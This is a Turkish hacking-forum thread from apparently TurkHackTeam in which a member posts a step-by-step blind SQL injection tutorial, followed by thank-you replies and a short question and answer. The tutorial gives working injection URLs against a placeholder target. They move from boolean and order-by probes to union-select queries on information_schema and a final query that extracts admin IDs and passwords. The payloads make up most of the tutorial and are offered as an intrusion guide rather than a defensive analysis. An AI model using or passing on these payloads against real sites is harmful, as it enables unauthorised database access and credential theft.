THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

Blind Sql İnjection // T3RMiN4TOR

T3RMiN4TOR - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2013
Nereden:
İstanbul
Mesajlar:
5.006
Konular:
1312
Teşekkür (Etti):
979
Teşekkür (Aldı):
1469
Ticaret:
(0) %
08-05-2017 21:55
#1
Blind Sql İnjection // T3RMiN4TOR


Merhaba arkadaşlar,

Bugün ki konumuz injection çeşitlerinden olan blind sql injection.


Peki nedir bu Blind Sql İnjection?


Normal sql injection yönteminden ziyade bu yöntem de hata almadan yapabileceğimiz injection yöntemidir. Hedef sitede eğer blind sql injection yöntemini kullanacaksanız o sayfanın hata vermesini değil, sayfanın değişmesine dikkat etmelisiniz.

Bu yöntemi örnek göstererek anlatırsak eğer;

http://www. hedefwebsite. com/hedefurl. php?id=4 '

Yukarıdaki gördüğünüz yöntem normal sql injection yöntemidir. Ve url ' nin doğruluğunu yada yanlışlığını döndürmesi için ( ' ) işareti koyulur. Ama burada dikkat edeceğimiz şey bu değildir.

Eğer Blind Sql İnjection yöntemini kullanacaksak şu şekilde yapmamız gerekir;

Herkes tarafından ve en popüler olan and sorgusu ile yöntemi denemek. Bu da şu şekilde olacaktır.

http://www. hedefwebsite .com/hedefurl. php?id=4 ' and 1=1 veya

http://www. hedefwebsite .com/hedefurl .php?id=4 ' and 1=2 bu sorgulardan eğer and 1=1 sorunsuz bir şekilde karşımıza geliyor ama and 1=2 eşitliği karşımıza açılan web sitesinde eksik bilgiler ile
geliyorsa tebrik ederim Blind Sql İnjection açığını bulmuşuz demektir.

Peki kolon sayısını nasıl bulacağız?

http://www. hedefwebsite .com/hedefurl. php?id=4 '+and+1=1+order+by+1

Bu yöntemi normal sql injection yönteminden hatırlayacaksınız ve o şekilde sayıları artırarak sayfanın değişmesini bekliyoruz. Sayfa hangi sayıda değişiyorsa o bizim kolon sayımızdır.

Sorgumuzu da Oluşturalım

Sorgumuzu oluştururken aşağıdaki aşağıdaki yöntemi uyguluyoruz.

http://www. hedefwebsite .com/hedefurl .php?id=4 '+and+1=0+union+select+0,1,2,3

Bkz. Burada dikkat etmeniz gereken husus 1=1 eşitliğini değilde 1=0 eşitliğini kullanmış olmam. Oluşturduğumuz sorguda 3 numaralı olanı varsaydık.

Sıra geldi tabloları çekmeye

Bu adımımız normal sql injection gibi uyguluyoruz ve şu şekilde yapıyoruz;

2 numaralı kolonumuzu kullanıyoruz.

http://www .hedefwebsite .com/hedefurl .php?id=4 '+and+1=1+union+select+0,1,group_concat(table_name ),3+from+information_schema.tables

Tablolardan Verimizi Çekelim

Çoğu adımımızda olduğu gibi bu adımda da normal sql injection yönteminden gideceğiz...

http://www. hedefwebsite .com/hedefurl .php?id=4 '+and+1=1+union+select+0,1,group_concat(column_nam e),3+from+information_schema.columns+where+table_n ame='61646d696e'

Admin tablosunun çıktığını varsayarsak; (61646d696e) admin tablosunun hex karşılığıdır.
Bunu da şu şekilde yapabiliriz; Google > Tex to Hex Convertor > Enter

Kolonlardan Veri Çekme

Admin Tablosundan ID ve Password Kolonları Çıktığını Varsayıyorum.ID ve Password Kolonlarının Değerlerini Öğrenelim.Veriler Karışmasın Diye Kolonlar Arasında "0x3a" Kodunu Ekliyoruz.

http://www. hedefwebsite .com/hedefurl .php?id=4 '+and+1=1+union+select+0,1,concat(ID,0x3a,Password ),3+from+admin

Konumuz burada sona ermiştir.
Umarım yardımcı olmuşumdur.




---------------------
Telegram'ı Türkçe kullanmak istiyorsanız, aşağıdaki linke tıklayınız...

HACKERTHT - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
11/2006
Nereden:
TÜRK
Yaş:
40
Mesajlar:
10.515
Konular:
316
Teşekkür (Etti):
6800
Teşekkür (Aldı):
3480
Ticaret:
(0) %
08-05-2017 22:04
#2
Gençler için faydalı olacaktır
--------------------- Türklüğü yüceltmek için yaşa, Türk’e kılıç kaldıran eli kır!

Her Gün Ölmekten Se Bir gün Ölmeyi Tercih Ederim !

TurkHackTeam.Org/Net © 2006 - 2020



T3RMiN4TOR Teşekkür etti.
UNEQUAL - ait Kullanıcı Resmi (Avatar)
Administrator
Üyelik tarihi:
02/2015
Nereden:
İstanbul
Mesajlar:
4.221
Konular:
506
Teşekkür (Etti):
2073
Teşekkür (Aldı):
5076
Ticaret:
(0) %
08-05-2017 22:08
#3
Ellerine sağlık T3.
T3RMiN4TOR Teşekkür etti.
KoyuAdam - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
02/2012
Yaş:
23
Mesajlar:
5.907
Konular:
942
Teşekkür (Etti):
1920
Teşekkür (Aldı):
2330
Ticaret:
(0) %
08-05-2017 22:15
#4
emeğine sağlık güzel konu
--------------------- G101010101010
A010101010101
U101010101010
S010101010101
S101010101010
T3RMiN4TOR Teşekkür etti.
fakelifee - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Mesajlar:
100
Konular:
14
Teşekkür (Etti):
5
Teşekkür (Aldı):
3
Ticaret:
(0) %
08-05-2017 22:24
#5
Normal manuel sql den farkı ne
dexter1415 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Mesajlar:
51
Konular:
3
Teşekkür (Etti):
0
Teşekkür (Aldı):
8
Ticaret:
(0) %
08-05-2017 22:31
#6
Ellerine sağlık
T3RMiN4TOR Teşekkür etti.
muhammedse02 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Nereden:
Hızır(a.s)
Mesajlar:
1.034
Konular:
202
Teşekkür (Etti):
95
Teşekkür (Aldı):
150
Ticaret:
(0) %
T3RMiN4TOR Teşekkür etti.
T3RMiN4TOR - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2013
Nereden:
İstanbul
Mesajlar:
5.006
Konular:
1312
Teşekkür (Etti):
979
Teşekkür (Aldı):
1469
Ticaret:
(0) %
08-05-2017 22:33
#8
Alıntı:
fakelifee´isimli üyeden Alıntı Mesajı göster
Normal manuel sql den farkı ne
Normal sql de sayfa hata verir. Bunda ise sayfa degisir.
---------------------
Telegram'ı Türkçe kullanmak istiyorsanız, aşağıdaki linke tıklayınız...

Black-Spy' - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2013
Nereden:
İstanbul
Mesajlar:
6.041
Konular:
969
Teşekkür (Etti):
4227
Teşekkür (Aldı):
6364
Ticaret:
(0) %
08-05-2017 22:48
#9
Ellerine sağlık dostum
---------------------
Sizin dediğiniz ”Vatan” dağda başlayıp çöplükte biter. Bizim bildiğimiz ”Vatan” yürekte başlayıp ”ŞEHADETLE” biter!

http://i.hizliresim.com/GkVJEb.gif

@blackspy_tht
blackspy@turkhackteam.info
T3RMiN4TOR Teşekkür etti.
BAMSIBEY - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
03/2017
Nereden:
root@Yakuza
Mesajlar:
544
Konular:
37
Teşekkür (Etti):
300
Teşekkür (Aldı):
62
Ticaret:
(0) %
08-05-2017 22:48
#10
Elinde sağlık yararlı konu
T3RMiN4TOR Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler